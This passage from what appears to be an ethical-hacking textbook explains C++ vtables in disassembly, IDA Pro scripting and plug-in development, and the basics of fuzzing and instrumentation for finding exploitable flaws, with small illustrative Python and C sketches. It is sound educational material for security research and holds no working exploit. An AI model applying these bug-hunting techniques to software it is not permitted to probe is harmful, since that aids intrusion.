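This is the shape that Borland and g++ produce at the machine level, which is why their output resembles an ordinary C function taking a pointer to a structure as its first argument.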
C++ Vtables
Virtual tables (vtables) are the mechanism underlying virtual functions and polymorphism
in C++. For each class that contains virtual member functions, the C++ compiler
generates a table of pointers called a vtable. A vtable contains an entry for each virtual
function in a class, and the compiler fills each entry with a pointer to the virtual function’s
implementation. Subclasses that override any virtual functions each receive their
own vtable. The compiler copies the superclass’s vtable, replacing the pointers of any
functions that have been overridden with pointers to their corresponding subclass
implementations. The following is an example of superclass and subclass vtables:
SuperVtable dd offset func1 ; DATA XREF: Super::Super(void)
dd offset func2
dd offset func3
dd offset func4
dd offset func5
dd offset func6
SubVtable dd offset func1 ; DATA XREF: Sub::Sub(void)
dd offset func2
dd offset sub_4010A8
dd offset sub_4010C4
dd offset func5
dd offset func6
As can be seen, the subclass overrides func3 and func4, but inherits the remaining virtual
functions from its superclass. The following features of vtables make them stand
out in disassembly listings:
• Vtables are usually found in the read-only data section of a binary.
• Vtables are referenced directly only from object constructors and destructors.
• By examining similarities among vtables, it is possible to understand
inheritance relationships among classes in a C++ program.
• When a class contains virtual functions, all instances of that class will contain a
pointer to the vtable as the first field within the object. This pointer is
initialized in the class constructor.
• Calling a virtual function is a three-step process. First, the vtable pointer must be
read from the object. Second, the appropriate virtual function pointer must be read
from the vtable. Finally, the virtual function can be called via the retrieved pointer.
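The three-step virtual call and the way a subclass vtable is derived from its superclass can be modeled in a few lines. The Python sketch below simulates a tiny 32-bit address space. Every address in it, along with the function table FUNCS, is invented for illustration and is not taken from any real binary.

```python
import struct

PTR = 4                       # 32-bit pointers, matching the dd entries above
memory = bytearray(0x100)     # tiny simulated address space

# Invented code addresses standing in for compiled virtual functions.
FUNCS = {
    0x401000: lambda this: "Super::func1",
    0x401010: lambda this: "Super::func2",
    0x401020: lambda this: "Super::func3",
    0x4010A8: lambda this: "Sub::func3",
}

def write_ptrs(addr, ptrs):
    struct.pack_into(f"<{len(ptrs)}I", memory, addr, *ptrs)

def read_ptr(addr):
    return struct.unpack_from("<I", memory, addr)[0]

SUPER_VTABLE, SUB_VTABLE = 0x10, 0x20
super_entries = [0x401000, 0x401010, 0x401020]
sub_entries = list(super_entries)   # start from a copy of the superclass table
sub_entries[2] = 0x4010A8           # replace the slot of the overridden function
write_ptrs(SUPER_VTABLE, super_entries)
write_ptrs(SUB_VTABLE, sub_entries)

def construct(obj_addr, vtable_addr):
    """Constructor: store the vtable pointer as the object's first field."""
    write_ptrs(obj_addr, [vtable_addr])
    return obj_addr

def virtual_call(this, index):
    vptr = read_ptr(this)                    # step 1: read vtable pointer from object
    target = read_ptr(vptr + index * PTR)    # step 2: read function pointer from vtable
    return FUNCS[target](this)               # step 3: call through the pointer

sup = construct(0x40, SUPER_VTABLE)
sub = construct(0x50, SUB_VTABLE)
print(virtual_call(sup, 2), virtual_call(sub, 2), virtual_call(sub, 0))
```

Comparing the two tables entry by entry, as an analyst would in a disassembly, shows that only slot 2 differs, which is the evidence that the subclass overrides exactly that one function.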
Reference
FLIRT Reference www.datarescue.com/idabase/flirt.htm
Extending IDA
Although IDA Pro is an extremely powerful disassembler on its own, it is rarely possible
for a piece of software to meet every need of its users. To provide as much flexibility as
possible to its users, IDA was designed with extensibility in mind. Its extension mechanisms include
a custom scripting language for automating simple tasks, and a plug-in architecture that
allows for more complex, compiled extensions.
Scripting with IDC
IDA’s scripting language is named IDC. IDC is a very C-like language that is interpreted
rather than compiled. Like many scripting languages, IDC is dynamically typed, and can
be run in something close to an interactive mode, or as complete stand-alone scripts
contained in .idc files. IDA does provide some documentation on IDC in the form of
help files that describe the basic syntax of the language and the built-in API functions
available to the IDC programmer. Like other IDA documentation, that available for IDC
follows a rather minimalist approach consisting primarily of comments from various
IDC header files. Learning the IDC API generally requires browsing the IDC documentation
until you discover a function that looks like it might do what you want, then playing
around with that function until you understand how it works. The following points
offer a quick rundown of the IDC language:
• IDC understands C++ style single- or multiline comments.
• IDC has no explicit data types.
• No global variables are allowed in IDC script files.
• If you require variables in your IDC scripts, they must be declared as the first
lines of your script or the first lines within any function.
• Variable declarations are introduced using the auto keyword:
auto addr, j, k, val;
auto min_ea, max_ea;
• Function declarations are introduced with the static keyword. Functions have no
explicit return type. Function argument declarations do not require the auto
keyword. If you want to return a value from a function, simply return it.
Different control paths can return different data types:
static demoIdcFunc(val, addr) {
    if (addr > 0x4000000) {
        return addr + val; // return an int
    }
    else {
        return "Bad addr"; // return a string
    }
}
• IDC offers most C control structures, including if, while, for, and do. The break
and continue statements are available within loops. There is no switch statement.
As with C, all statements must terminate with a semicolon. C-style bracing with
{ and } is used.
• Most C-style operators are available in IDC. Operators that are not available
include += and all other operators of the form <op>= (the compound assignment operators).
• There is no array syntax available in IDC. Sparse arrays are implemented as
named objects via the CreateArray, DeleteArray, SetArrayLong, SetArrayString,
GetArrayElement, and GetArrayId functions.
• Strings are a native data type in IDC. String concatenation is performed using
the + operator, while string comparison is performed using the == operator.
There is no character data type; instead use strings of length one.
• IDC understands the #define and #include directives. All IDC scripts executed
from files must have the directive #include <idc.idc>. Interactive scripts need not
include this file.
• IDC script files must contain a main function as follows:
static main() {
//idc statements
}
Executing IDC Scripts
There are two ways to execute an IDC script, both accessible via IDA’s File menu. The first
method is to execute a stand-alone script using the File | IDC File menu option. This will
bring up a file open dialog box to select the desired script to run. A stand-alone script has
the following basic structure:
#include <idc.idc>
/*
 * Other idc files may be #include'd if you have split your code
 * across several files.
 *
 * Standalone scripts can have no global variables, but can have
 * any number of functions.
 *
 * A standalone script must have a main function
 */
static main() {
    //statements for main, beginning with any variable declarations
}
The second method for executing IDC commands is to enter just the commands you wish
to execute in a dialog box provided by IDA via the File | IDC Command menu item. In this
case, you must not enter any function declarations or #include directives. IDA wraps the
statements that you enter in a main function and executes them, so only statements that
are legal within the body of a function are allowed here. Figure 13-5 shows an example of
the Hello World program implemented using the File | IDC Command.
IDC Script Examples
While there are many IDC functions available that provide access to your IDA databases, a
few functions are relatively essential to know. These provide minimal access to read and
write values in the database, output simple messages, and control the cursor location within
the disassembly view. Byte(addr), Word(addr), and Dword(addr) read 1, 2, and 4 bytes
respectively from the indicated address. PatchByte(addr, val), PatchWord(addr, val), and
PatchDword(addr, val) patch 1, 2, and 4 bytes respectively at the indicated address. Note
that the use of the PatchXXX functions changes only the IDA database; they have no effect
whatsoever on the original program binary. Message(format, …) is similar to the C printf
command, taking a format string and a variable number of arguments, and printing the
result to the IDA message window. If you want a carriage return, you must include it in your
format string. Message provides the only debugging capability that IDC possesses, as no
IDC debugger is available. Additional user interface functions are available that interact with
a user through various dialog boxes. AskFile, AskYN, and AskStr can be used to display a
file selection dialog box, a simple yes/no dialog box, and a simple one-line text input dialog
box, respectively. Finally, ScreenEA() reads the address of the current cursor line, while
Jump(addr) moves the cursor (and the display) to make addr the current address in the disassembly
view.
Scripts can prove useful in a wide variety of situations. Halvar’s BugScam vulnerability
scanner is implemented as a set of IDC scripts. One situation in which scripts come in
very handy is for decoding data or code within a binary that may have been obfuscated
in some way. Scripts are useful in this case to mimic the behavior of the program in order
to avoid the need to run the program. Such scripts can be used to modify the database in
much the same way that the program would modify itself if it were actually running. The
following script demonstrates the implementation of a decoding loop using IDC to
modify a database:
//x86 decoding loop     | //IDC Decoding loop
mov ecx, 377            | auto i, addr, val;
mov esi, 8049D2Eh       | addr = 0x08049D2E;
mov edi, esi            | for (i = 0; i < 377; i++) {
loc_8049D01:            |    val = Byte(addr);
lodsb                   |    val = val ^ 0x4B;
xor al, 4Bh             |    PatchByte(addr, val);
stosb                   |    addr++;
loop loc_8049D01        | }
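For readers who want to experiment with the same transformation outside of IDA, here is a stand-alone Python sketch of the decoding loop. It operates on an ordinary bytearray rather than an IDA database, and the buffer contents and the 16-byte prefix are fabricated test data. Only the key (0x4B) and the length (377) come from the listing above.

```python
KEY = 0x4B      # xor al, 4Bh
COUNT = 377     # mov ecx, 377

def xor_decode(buf, start, count=COUNT, key=KEY):
    """XOR count bytes of buf in place, beginning at index start."""
    for i in range(start, start + count):
        buf[i] ^= key
    return buf

# Fabricated test data: 16 untouched bytes followed by 377 encoded bytes.
plain = bytes(range(256)) + bytes(121)
image = bytearray(b"\x90" * 16 + bytes(b ^ KEY for b in plain))

xor_decode(image, 16)
print(bytes(image[16:]) == plain)   # prints True
```

Because XOR is its own inverse, running the function a second time over the same range restores the encoded bytes, which is a convenient way to check a decoder before patching a real database.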
Figure 13-5 IDC command execution
IDA Pro Plug-In Modules and the IDA SDK
IDC is not suitable for all situations. IDC cannot define complex data structures,
perform efficient dynamic memory allocation, or access native programming APIs
such as those in the C standard library or Windows API, and it does not provide access to
the lowest levels of IDA databases. Additionally, in cases where speed is required, IDC
may not be the most suitable choice. For these situations, IDA provides an SDK (Software
Development Kit) that publishes the C++ interface specifications for the native
IDA API. The IDA SDK enables the creation of compiled C++ plug-ins as extensions to
IDA Pro. The SDK is included with recent IDA distributions or is available as a separate
download from the DataRescue website. A new SDK is released with each new version of
IDA, and it is imperative that you use a compatible SDK when creating plug-ins for your
version of IDA. Compiled plug-ins are generally compatible only with the version of
IDA that corresponds to the SDK with which the plug-in was built. This can lead to problems
when plug-in authors fail to provide new plug-in binaries for each new release of
IDA. As with other IDA documentation, the SDK documentation is rather sparse. API
documentation is limited to the supplied SDK header files, while documentation for
compiling and installing plug-ins is limited to a few readme files. A great guide for learning
to write plug-ins was published in 2005 by Steve Micallef, and covers build environment
configuration as well as many useful API functions. His plug-in writing tutorial is a
must read for anyone who wants to learn the nuts and bolts of IDA plug-ins.
Basic Plug-In Concept
First, the plug-in API is published as a set of C++ header (.hpp) files in the SDK’s include
directory. The contents of these files are the ultimate authority on what is or is not available
to you in the IDA SDK. There are two essential files that each plug-in must include:
ida.hpp and loader.hpp. Ida.hpp declares the global
variable inf. The inf variable is populated with information about the current database,
such as processor type, program entry point, minimum and maximum virtual address
values, and much more. Plug-ins that are specific to a particular processor or file format
can examine the contents of the inf variable to learn whether they are compatible with
the currently loaded file. Loader.hpp defines the plugin_t structure and contains the
appropriate declaration to export a specific instance of a programmer-defined plugin_t.
This is the single most important structure for plug-in authors, as it is mandatory to
declare a single global plugin_t variable named PLUGIN. When a plug-in is loaded into
IDA, IDA examines the exported PLUGIN variable to locate several function pointers
that IDA uses to initialize, execute, and terminate each plug-in. The plug-in structure is
defined as follows:
class plugin_t {
public:
  int version;               // Set this to IDP_INTERFACE_VERSION
  int flags;                 // plugin attributes often set to 0
                             // refer to loader.hpp for more info
  int (idaapi* init)(void);  // plugin initialization function, called once for
                             // each database that is loaded. Return value
                             // indicates how Ida should treat the plugin
  void (idaapi* term)(void); // plugin termination function. called when a
                             // plugin is unloaded. Can be used for plugin
                             // cleanup or set to NULL if no cleanup required.
  void (idaapi* run)(int arg); // plugin execution function. This is the function
                             // that is called when a user activates the plugin
                             // using the Edit menu or assigned plugin hotkey
  char *comment;             // Long description of the plugin. Not terribly
                             // important.
  char *help;                // Multiline help about the plugin
  char *wanted_name;         // The name that will appear on the
                             // Edit/Plugins submenu
  char *wanted_hotkey;       // The hotkey sequence to activate the plugin
                             // "Alt-" or "Shift-F9" for example
};
An absolutely minimal plug-in that does nothing other than print a message to IDA’s
message window appears next.
NOTE Wanted_hotkey is just that, the hotkey you want to use. IDA makes no
guarantee that your wanted_hotkey will be available, as more than one plug-in
may request the same hotkey sequence. In such cases, the first plug-in that IDA
loads will be granted its wanted_hotkey, while subsequent plug-ins that request
the same hotkey will only be able to be activated by using the Edit | Plugins menu.
#include <ida.hpp>
#include <loader.hpp>
#include <kernwin.hpp>

int idaapi my_init(void) { //idaapi marks this as stdcall
    //Keep this plugin regardless of processor type
    return PLUGIN_KEEP; //refer to loader.hpp for valid return values
}

void idaapi my_run(int arg) { //idaapi marks this as stdcall
    //This is where we should do something interesting
    static int count = 0;
    //The msg function is equivalent to IDC's Message
    msg("Plugin activated %d time(s)\n", ++count);
}

char comment[] = "This is a simple plugin. It doesn't do much.";
char help[] =
    "A simple plugin\n\n"
    "That demonstrates the basics of setting up a plugin.\n\n"
    "It doesn't do a thing other than print a message.\n";
char name[] = "GrayHat plugin";
char hotkey[] = "Alt-1";

plugin_t PLUGIN = {
    IDP_INTERFACE_VERSION, 0, my_init, NULL, my_run,
    comment, help, name, hotkey
};
The IDA SDK includes source code, along with make files and Visual Studio workspace
files for several sample plug-ins. The biggest hurdle faced by prospective plug-in authors
is learning the IDA API. The plug-in API is far more complex than the API presented for
IDC scripting. Unfortunately, plug-in API function names do not match IDC API function
names, though generally if a function exists in IDC, you will be able to find a similar
function in the plug-in API. Reading the plug-in writer’s guide along with the SDK-supplied
headers and the source code to existing plug-ins is really the only way to learn
how to write plug-ins.
Building IDA Plug-Ins
Plug-ins are essentially shared libraries. On the Windows platform, this equates to a
DLL. When building a plug-in, you must configure your build environment to build a
DLL and link to the required IDA libraries. The process is covered in detail in the plug-in
writer’s guide and many examples exist to assist you. The following is a summary of configuration
settings that you must make:
1. Specify build options to build a shared library.
2. Set the plug-in and architecture-specific defines: __IDP__, and either __NT__ or __LINUX__.
3. Add the appropriate SDK library directory to your library path. The SDK contains
a number of libXXX directories for use with various build environments.
4. Add the SDK include directory to your include directory path.
5. Link with the appropriate ida library (ida.lib, ida.a, or pro.a).
6. Make sure your plug-in is built with an appropriate extension (.plw for
Windows, .plx for Linux).
Once you have successfully built your plug-in, installation is simply a matter of copying
the compiled plug-in to IDA’s plug-in directory. This is the directory within your IDA
program installation, not within your SDK installation. Any open databases must be
closed and reopened in order for IDA to scan for and load your plug-in. Each time a
database is opened in IDA, every plug-in in the plugins directory is loaded and its init
function executed. Only plug-ins whose init functions return PLUGIN_OK or PLUGIN_KEEP
(refer to loader.hpp) will be kept by IDA. Plug-ins that return PLUGIN_SKIP will
not be made available for the current database.
The IDAPython Plug-In
The IDAPython plug-in by Gergely Erdelyi is an excellent example of extending the
power of IDA via a plug-in. The purpose of IDAPython is to make scripting both easier
and more powerful at the same time. The plug-in consists of two major components: an
IDA plug-in written in C++ that embeds a Python interpreter into the current IDA process,
and a set of Python APIs that provides all of the scripting capability of IDC. By making
all of the features of Python available to a script developer, IDAPython provides both
an easier path to IDA scripting, because users can leverage their knowledge of Python
rather than learning a new language (IDC), and a much more powerful scripting interface,
because all of the features of Python including data structures and APIs become
available to the script author. A similar plug-in named IDARub was created by Spoonm
to bring Ruby scripting to IDA as well.
The x86emu Plug-In
The x86emu plug-in by Chris Eagle addresses a different type of problem for the IDA
user, that of analyzing obfuscated code. All too often, malware samples, among other
things, employ some form of obfuscation technique to make disassembly analysis more
difficult. The majority of obfuscation techniques employ some form of self-modifying
code that renders static disassembly listings all but useless other than to analyze the de-obfuscation
algorithms. Unfortunately, the de-obfuscation algorithms seldom contain
the malicious behavior of the code being analyzed, and as a result, the analyst is unable
to make much progress until the code can be de-obfuscated and disassembled yet again.
Traditionally, this has required running the code under the control of a debugger until
the de-obfuscation has been completed, then capturing a memory dump of the process,
and finally, disassembling the captured memory dump. Unfortunately, many obfuscation
techniques have been developed that attempt to thwart the use of debuggers and
virtual machine environments. The x86emu plug-in embeds an x86 emulator within
IDA and offers users the opportunity to step through disassembled code as if it were
loaded into memory and running. The emulator treats the IDA database as its virtual
memory and provides an emulation stack, heap, and register set. If the code being emulated
is self-modifying, then the emulator reflects the modifications in the loaded database.
In this way emulation becomes the tool to both de-obfuscate the code and to
update the IDA database to reflect all self-modifications without ever running the malicious
code in question. X86emu will be discussed further in Chapter 21.
IDA Pro Loaders and Processor Modules
The IDA SDK can be used to create two additional types of extensions for use with IDA.
IDA processor modules are used to provide disassembly capability for new or unsupported
processor families, while IDA loader modules are used to provide support for new
or unsupported file formats. Loaders may make use of existing processor modules, or may
require the creation of entirely new processor modules if the CPU type was previously
unsupported. An excellent example of a loader module is one designed to parse ROM
images from gaming systems. Several example loaders are supplied with the SDK in the ldr
subdirectory, while several example processor modules are supplied in the module subdirectory.
Loaders and processor modules tend to be required far less frequently than plug-in
modules, and as a result, far less documentation and far fewer examples exist to assist in
their creation. At their heart, both have architectures similar to plug-ins.
Loader modules require the declaration of a global loader_t (from loader.hpp) variable
named LDSC. This structure must be set up with pointers to two functions, one to
determine the acceptability of a file for a particular loader, and the other to perform the
actual loading of the file into the IDA database. IDA’s interaction with loaders is as
follows:
1. When a user chooses a file to open, IDA invokes the accept_file function for
every loader in the IDA loaders subdirectory. The job of the accept_file function
is to read enough of the input file to determine if the file conforms to the
format recognized by the loader. If the accept_file function returns a nonzero
value, then the name of the loader will be displayed for the user to choose
from. Figure 13-3 shows an example in which the user is being offered the
choice of three different ways to load the program. In this case, two different
loaders (pe.ldw and dos.ldw) have claimed to recognize the file format while
IDA always offers the option to load a file as a raw binary file.
2. If the user elects to utilize a given loader, the loader’s load_file function is called
to load the file content into the database. The job of the loader can be as complex
as parsing files, creating program segments within IDA, and populating those
segments with the correct content from the file, or it can be as simple as passing
off all of that work to an appropriate processor module.
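The two-step interaction above can be modeled in plain Python. The sketch below is not the IDA loader API. It borrows only the accept_file and load_file roles from the text, and the loader names, the signature checks, and the dictionary standing in for the database are all assumptions made for illustration.

```python
import io

def accept_dos(f):
    """accept_file role: nonzero if the file begins with the 'MZ' signature."""
    f.seek(0)
    return int(f.read(2) == b"MZ")

def accept_elf(f):
    """accept_file role: nonzero if the file begins with the ELF magic."""
    f.seek(0)
    return int(f.read(4) == b"\x7fELF")

def make_load_file(tag):
    """Build a trivial load_file that copies the whole file into the database."""
    def load_file(f, database):
        f.seek(0)
        database["loader"] = tag
        database["bytes"] = f.read()
    return load_file

# Hypothetical loaders directory: name -> (accept_file, load_file)
LOADERS = {
    "dos": (accept_dos, make_load_file("dos")),
    "elf": (accept_elf, make_load_file("elf")),
}

def offered_loaders(f):
    """Step 1: ask every loader; raw binary is always offered as a fallback."""
    names = [name for name, (accept, _) in LOADERS.items() if accept(f)]
    return names + ["binary"]

def load(f, choice, database):
    """Step 2: run the load_file function of the loader the user picked."""
    load_file = make_load_file("binary") if choice == "binary" else LOADERS[choice][1]
    load_file(f, database)

sample = io.BytesIO(b"MZ\x50\x00rest of file")
choices = offered_loaders(sample)
database = {}
load(sample, choices[0], database)
print(choices, database["loader"])
```

A real loader does considerably more in its load step, such as creating segments and marking entry points, but the accept-then-load division of labor is the same.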
Loaders are built in much the same manner as plug-ins, the primary difference being the
file extension, which is .ldw for Windows loaders, and .llx for Linux loaders. Install compiled
loaders into the loaders subdirectory of your IDA distribution.
IDA processor modules are perhaps the most complicated modules to build. Processor
modules require the declaration of a global processor_t (defined in idp.hpp) structure
named LPH. This structure must be initialized to point to a number of arrays and
functions that will be used to generate the disassembly listing. Required arrays define
the mapping of opcode names to opcode values, the names of all registers, and a variety
of other administrative data. Required functions include an instruction analyzer whose
job is simply to determine the length of each instruction and to split the instruction’s
bytes into opcode and operand fields. This function is typically named ana and generates
no output. An emulation function typically named emu is responsible for tracking
the flow of the code and adding additional target instructions to the disassembly queue.
Output of disassembly lines is handled by the out and out_op functions, which are
responsible for generating disassembly lines for display in the IDA disassembly window.
There are a number of ways to generate disassembly lines via the IDA API, and the best
way to learn them is by reviewing the sample processor modules supplied with the IDA
SDK. The API provides a number of buffer manipulation primitives to build disassembly
lines a piece at a time. Output generation is performed by writing disassembly line
parts into a buffer then, once the entire line has been assembled, writing the line to the
IDA display. Buffer operations should always begin by initializing your output buffer
using the init_output_buffer function. IDA offers a number of OutXXX and out_xxx
functions that send output to the buffer specified in init_output_buffer. Once a line has
been constructed, the output buffer should be finalized with a call to term_output_buffer
before sending the line to the IDA display using the printf_line function.
The majority of available output functions are defined in the SDK header file ua.hpp.
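To make the division of labor among the analyzer, emulator, and output functions concrete, here is a toy disassembler in Python. It is a conceptual sketch only: the four-opcode instruction set is invented, the function names ana, emu, and out are borrowed from the text purely as labels, and none of the code corresponds to actual SDK signatures.

```python
from collections import deque

# Invented instruction set: opcode -> (mnemonic, total length in bytes)
OPCODES = {0x00: ("ret", 1), 0x01: ("nop", 1), 0x02: ("push", 2), 0x03: ("jmp", 2)}

def ana(code, ea):
    """Analyzer: determine length and split out the operand; no output."""
    mnem, length = OPCODES[code[ea]]
    operand = code[ea + 1] if length == 2 else None
    return {"ea": ea, "mnem": mnem, "len": length, "op": operand}

def emu(insn):
    """Emulator: report which addresses execution can reach next."""
    if insn["mnem"] == "ret":
        return []
    fallthrough = insn["ea"] + insn["len"]
    if insn["mnem"] == "jmp":
        # Signed 8-bit displacement, relative to the end of the instruction.
        rel = insn["op"] - 256 if insn["op"] >= 128 else insn["op"]
        return [fallthrough + rel]
    return [fallthrough]

def out(insn):
    """Output: build the display line one piece at a time, then join it."""
    parts = [f"{insn['ea']:04X}", insn["mnem"]]
    if insn["op"] is not None:
        parts.append(f"{insn['op']:02X}h")
    return " ".join(parts)

def disassemble(code, entry=0):
    queue, seen, lines = deque([entry]), set(), {}
    while queue:
        ea = queue.popleft()
        if ea in seen or not 0 <= ea < len(code):
            continue
        seen.add(ea)
        insn = ana(code, ea)
        lines[ea] = out(insn)
        queue.extend(emu(insn))       # follow the flow of the code
    return [lines[ea] for ea in sorted(lines)]

# push 05h; jmp +1 (skipping one junk byte); nop; ret
code = bytes([0x02, 0x05, 0x03, 0x01, 0xFF, 0x01, 0x00])
listing = disassemble(code)
print("\n".join(listing))
```

Because the emulator step follows the jump, the junk byte at offset 4 is never handed to the analyzer. This is the reason flow tracking is kept separate from instruction decoding.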
Finally, one word concerning building processor modules: while the basic build process
is similar to that used for plug-ins and loaders, processor modules require an additional
post-processing step. The SDK provides a tool named mkidp, which is used to insert a
description string into the compiled processor binary. For Windows modules, mkidp
expects to insert this string in the space between the MSDOS header and the PE header.
Some compilers, such as g++, in the author’s experience do not leave enough space
between the two headers for this operation to be performed successfully. The IDA SDK
does provide a custom DOS header stub named simply stub designed as a replacement
for the default MSDOS header. Getting g++ to use this stub is not an easy task. It is recommended
that Visual Studio tools be used to build processor modules for use on Windows.
By default, Visual Studio leaves enough space between the MSDOS and PE
headers for mkidp to run successfully. Compiled processor modules should be installed
to the IDA procs subdirectory.
References
Open RCE Forums www.openrce.org
Data Rescue IDA Customer Forums www.datarescue.com/cgi-bin/ultimatebb.cgi
IDA Plugin Writing Tutorial www.binarypool.com/idapluginwriting/
IDAPython plug-in http://d-dome.net/idapython/
IDARub plug-in www.metasploit.com/users/spoonm/idarub/
x86emu plug-in http://ida-x86emu.sourceforge.net/
Gray Hat Hacking: The Ethical Hacker’s Handbook
CHAPTER 14 Advanced Reverse Engineering
In this chapter, you will learn about the tools and techniques used for runtime detection
of potentially exploitable conditions in software.
• Why should we try to break software?
• Review of the software development process
• Tools for instrumenting software
• Debuggers
• Code coverage tools
• Profiling tools
• Data flow analysis tools
• Memory monitoring tools
• What is “fuzzing”?
• Basic fuzzing tools and techniques
• A simple URL fuzzer
• Fuzzing unknown protocols
• SPIKE
• SPIKE Proxy
• Sharefuzz
In the previous chapter we took a look at the basics of reverse engineering source code
and binary files. Conducting reverse engineering with full access to the way in which an
application works (regardless of whether this is a source view or binary view) is called
white box testing. In this chapter, we take a look at alternative methodologies, often
termed black box and gray box testing; both require running the application that we are
analyzing. In black box testing, you know no details of the inner workings of the application,
while gray box testing combines white box and black box techniques in which
you might run the application under control of a debugger, for example. The intent of
these methodologies is to observe how the application responds to various input stimuli.
The remainder of this chapter discusses how to go about generating interesting input
values and how to analyze the behaviors that those inputs elicit from the programs you
are testing.
Why Try to Break Software?
In the computer security world, debate always rages as to the usefulness of vulnerability
research and discovery. Other chapters in this book discuss some of the ethical issues
involved, but in this chapter we will attempt to stick to practical reasons. Consider the
following facts:
• There is no regulatory agency for software reliability.
• Virtually no software is guaranteed to be free from defects.
• Most end-user license agreements (EULAs) require the user of a piece of
software to hold the author of the software free from blame for any damage
caused by the software.
Given these circumstances, who is to blame when a computer system is broken into
because of a newly discovered vulnerability in an application or the operating system
that happens to be running on that computer? Arguments are made either way, blaming
the vendor for creating the vulnerable software in the first place, or blaming the user for
failing to quickly patch or otherwise mitigate the problem. The fact is, given the current
state of the art in intrusion detection, users can only defend against known threats. This
leaves the passive user completely at the mercy of the vendor and ethical security
researchers to discover vulnerabilities and report them in order for vendors to develop
patches for those vulnerabilities before those same vulnerabilities are discovered and
exploited in a malicious fashion. The most aggressive sysadmin whose systems always
have the latest patches applied will always be at the mercy of those that possess zero-day
exploits. Vendors can’t develop patches for problems that they are unaware of or refuse
to acknowledge (which defines the nature of a zero-day exploit).
If you believe that vendors will discover every problem in their software before others
do, and you believe that those vendors will release patches for those problems in an
expeditious manner, then this chapter is probably not for you. This chapter (and others
in this book) is for those people who want to take at least some measure of control in
ensuring that their software is as secure as possible.
The Software Development Process
We will avoid any in-depth discussion of how software is developed, and instead
encourage you to seek out a textbook on software engineering practices. In many cases,
software is developed by some orderly, perhaps iterative, progression through the following
activities:
• Requirements analysis What the software needs to do
• Design Planning out the pieces of the program and considering how they will
interact
• Implementation Expressing the design in software source code
• Testing Ensuring that the implementation meets the requirements
• Operation and support Deployment of the software to end-users and
support of the product in end-user hands
Problems generally creep into the software during any of the first three phases. These
problems may or may not be caught in the testing phase. Unfortunately, those problems
that are not caught in testing are destined to manifest themselves after the software is
already in operation. Many developers want to see their code operational as soon as possible
and put off doing proper error checking until after the fact. While they usually
intend to return and implement proper error checks once they can get some piece of
code working properly, all too often they forget to return and fill in the missing error
checks. The typical end-user has influence over the software only in its operational
phase. A security conscious end-user should always assume that there are problems that
have avoided detection all the way through the testing phase. Without access to source
code and without resorting to reverse engineering program binaries, end-users are left
with little choice but to develop interesting test cases and to determine whether programs
are capable of securely handling these test cases. A tremendous number of software
bugs are found simply because a user provided unexpected input to a program.
One method of testing software involves exposing the software to large numbers of
unusual input cases. This process is often termed stress testing when performed by the
software developer. When performed by a vulnerability researcher, it is usually called
fuzzing. The difference between the two is that the software developer has a far better idea of
how he expects the software to respond than the vulnerability researcher, who is often
hoping to simply record something anomalous.
Fuzzing is one of the main techniques used in black/gray box testing. To fuzz effectively,
two types of tools are required: instrumentation tools and fuzzing tools. Instrumentation
tools are used to pinpoint problem areas in programs either at runtime or
during post-crash analysis. Fuzzing tools are used to automatically generate large numbers
of interesting input cases and feed them to programs. If an input case can be found
that causes a program to crash, you make use of one or more instrumentation tools to
attempt to isolate the problem and determine whether it is exploitable.
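To make the idea of automatically generated input cases concrete, the following is a minimal sketch of mutation-based case generation in C. It is not taken from any particular fuzzing tool; the function names lcg_next and mutate_bytes, and the choice of a simple linear congruential generator, are assumptions made for illustration. A fixed seed is used so that any input that triggers a crash can be regenerated exactly.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Tiny linear congruential generator (hypothetical helper). A given seed
 * always reproduces the same sequence, so a crashing case can be replayed. */
uint32_t lcg_next(uint32_t *state) {
    *state = *state * 1664525u + 1013904223u;
    return *state;
}

/* Perform `flips` pseudo-random byte overwrites inside buf[0..len-1].
 * The same position may be chosen more than once.
 * Returns the number of overwrites performed (0 if the buffer is empty). */
size_t mutate_bytes(unsigned char *buf, size_t len, size_t flips, uint32_t seed) {
    assert(buf != NULL);
    if (len == 0) return 0;
    uint32_t state = seed;
    for (size_t i = 0; i < flips; i++) {
        size_t pos = lcg_next(&state) % len;               /* where to write */
        buf[pos] = (unsigned char)(lcg_next(&state) >> 24); /* what to write  */
    }
    return flips;
}
```

Calling mutate_bytes on a fresh copy of a valid request with a different seed each time yields a stream of slightly corrupted inputs that can be fed to the program under test.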
Instrumentation Tools
Thorough testing of software is a difficult proposition at best. The challenge to the tester
is to ensure that all code paths behave predictably under all input cases. To do this, test
cases must be developed that force the program to execute all possible instructions
within the program. Assuming the program contains error handling code, these tests
must include exceptional cases that cause execution to pass to each error handler. Failure
to perform any error checking at all, and failure to test every code path, are just two
of the problems that attackers may take advantage of. Murphy’s Law assures us that it
will be the one untested section of code that turns out to be exploitable.
Without proper instrumentation it will be difficult to impossible to determine why a
program has failed. When source code is available, it may be possible to insert “debugging”
statements to paint a picture of what is happening within a program at any given
moment. In such a case, the program itself is being instrumented and you can turn on as
much or as little detail as you choose. When all that is available is a compiled binary, it is
not possible to insert instrumentation into the program itself. Instead, you must make
use of tools that hook into the binary in various ways in your attempt to learn as much as
possible about how the binary behaves. In searching for potential vulnerabilities, it
would be ideal to use tools that are capable of reporting anomalous events, because the
last thing you want to do is sort through mounds of data indicating that a program is
running normally. We will cover several types of software testing tools and discuss their
applicability to vulnerability discovery. The following classes of tools will be reviewed:
• Debuggers
• Code coverage analysis tools
• Profiling tools
• Flow analysis tools
• Memory use monitoring tools
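When source code is available, the debugging statements described above are often routed through a single helper so that the amount of detail can be turned up or down. The following is a minimal sketch of that idea; debug_level and debug_log are hypothetical names and are not part of any standard library.

```c
#include <assert.h>
#include <stdarg.h>
#include <stdio.h>

/* Hypothetical global verbosity: 0 = silent, higher values = more detail. */
int debug_level = 0;

/* Print a message to stderr only if its level is currently enabled.
 * Returns 1 if the message was printed, 0 if it was suppressed. */
int debug_log(int level, const char *fmt, ...) {
    assert(fmt != NULL);
    if (level > debug_level) return 0;
    va_list ap;
    va_start(ap, fmt);
    fprintf(stderr, "[debug %d] ", level);
    vfprintf(stderr, fmt, ap);
    fputc('\n', stderr);
    va_end(ap);
    return 1;
}
```

With debug_level set to 1, a call such as debug_log(1, "read %d bytes", n) produces output while debug_log(2, ...) stays silent.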
Debuggers
Debuggers provide fine-grain control over an executing program and can require a fair
amount of operator interaction. During the software development process, they are
most often used for isolating specific problems rather than large scale automated testing.
When you use a debugger for vulnerability discovery, however, you take advantage
of the debugger’s ability to both signal the occurrence of an exception, and provide a
precise snapshot of a program’s state at the moment it crashes. During black box testing
it is useful to launch programs under the control of a debugger prior to any fault injection
